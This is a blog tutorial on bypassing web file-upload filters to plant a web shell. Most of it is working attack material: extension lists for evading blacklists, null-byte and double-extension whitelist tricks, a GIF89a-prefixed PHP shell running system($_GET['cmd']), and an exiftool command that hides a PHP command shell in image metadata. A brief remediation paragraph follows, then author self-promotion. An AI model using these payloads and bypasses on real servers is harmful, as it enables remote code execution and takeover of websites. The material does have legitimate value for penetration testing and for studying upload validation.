CodeX
Published in

CodeX

Bypass File Upload Restrictions

How to Get a Shell on a Website using a File [Tutorial]

Let’s get into this -

User-uploaded files can give hackers a potential entry point into web apps, making their safe handling an extremely important task for administrators and the security team. If these files are not validated properly, a remote attacker could upload a malicious file on the webserver and cause a serious breach. Malicious files uploads are the result of improper file validation. This leading to code execution. According to OWASP, unrestricted file upload vulnerabilities can allow two different types of attacks. Usually web apps have restrictions to try to make this kind of attacks more difficult, but there are various techniques hackers could use to beat file upload restrictions and get a reverse shell.

The Blacklist And Bypass 1

Blacklisting is a type of protection where certain strings of data, in many cases, specific extensions, are explicitly prohibited from being sent to the web app server. This may sound like the right solution to prevent dangerous extensions, often shells, from being uploaded to your website, but they aren’t hard to bypass.

here some alternative extensions that can be used to get around blacklist filters.

php.txt, .sh, .pht, .phtml, .phP, .Php, .php7, .php%00.jpeg, .cgi

Another popular extension for web shells are JSP — this is file a server-generated web page. It is similar to an .ASP or .PHP file, but contains Java code instead of ActiveX or PHP

.MF, .jspx, .jspf, .jsw, .jsv, xml, .war, .jsp, .aspx

Whitelist and Bypass 2

Method two is using whitelists. Whitelisting as the name say, is the opposite to blacklisting, These servers whitelist will only accept jpeg, gif, png, jpg, ect. This may sound like a better way of protecting your server than using a blacklist, but it can still be bypass using a few tricks. There are some pitfalls in this method too. They are records of server side bugs allowing users to bypass this protection, one of this is:

The IIS 6 semi-colon vulnerability caused by a parser bug which allow users to upload and execute file with names such as testing.asp;.jpg

Using a reverse shell with a photo extension, hackers can fool web app into accepting a php file that also has a JPG/PNG extension:

payload.php.jpg

Also using a null character injection we can bypass whitelist filters to make characters get ignored when the file is saved, injecting this between a forbidden extension and an allowed extension can lead to a bypass:

payload.php%00.jpg OR payload.php\x00.jpg

Usually, if an whitelist accepts only images, it may also accept gif files too. Adding GIF89a; to the very top of your shell may help you bypass the restriction and let you execute the shell.

GIF89a; <?php system($_GET['cmd']); ?>

Exif Data, ExifTool and Bypass 3

The next method to bypass file upload restrictions utilizes the Exif data in any image, such as the location, name, camera being used, and much more. Inserting a comment containing a reverse shell payload may by executed by the web app whenever the image is uploaded.

You can add your payload using a tool like exiftool

Inserting a short command shell as information into your photo may look something like this:

$ exiftool -DocumentName="<h1>chiara<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" pwtoken.jpeg

You can use Exiftool to check for the new added comment into your photo.

$ exiftool pwtoken.jpeg

Then just add a shell extension to make it a executable file once in the web app server:

$ mv catphoto.jpg catphoto.php\x00.jpg

Use this with the methods mentioned at the beginning of this article to bypass any or both blacklists and whitelists.

Remediation

Restrict file types accepted for upload: check the file extension and only allow certain files to be uploaded. Use a whitelist approach instead of a blacklist. Check for double extensions such as .php.png. Check for files without a filename like .htaccess (on ASP.NET, check for configuration files like web.config). Change the permissions on the upload folder so the files within it are not executable. If possible, rename the files that are uploaded.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — -

Need Your Help — If some from {Australia, Austria, Belgium, Canada, Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Hong Kong, Ireland, Italy, Japan, Latvia, Lithuania, Luxembourg, Mexico, Netherlands, New Zealand, Norway, Poland, Portugal, Romania, Singapore, Slovakia, Slovenia, Spain, Sweden, Switzerland, United Kingdom, United States}

Please DM me to my social media Handel or mail me at surendrachoudhary2976@gmail.com

— — — — — — — — — — — — — — — — — — — — — — — — — — — — -

Ending -

i hope you understand about file upload vulnerability.

You can subscribe to my YouTube channel for future hacking-related videos and updates !!
Channel link — https://www.youtube.com/c/TechnicalSurendrachannel

Thanks for reading this blog, If you find it valuable then give an applaud 👏👏 ,
Follow me & Share this blog to your friends and other community. I will see you in next blog . Till then keep learning keep exploring !

Peace ✌ !

My social medial accounts -

https://expy.bio/SurendraPander
Tweeter — https://twitter.com/technicalSure
YouTube — https://www.youtube.com/channel/UCZq87M0I0-zEfLuyyfEeE6Q
Instagram — https://www.instagram.com/surendra_choudhary1241/
Linkedin — https://www.linkedin.com/in/surendra-pander-4066761b7/

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Surendra Choudhury

Surendra Choudhury

Security researcher | Ethical Hacker | Penetration tester | CTF Lover | Bug Bounty hunter | YouTuber(Technicalsurendra) | Music lover |😍 |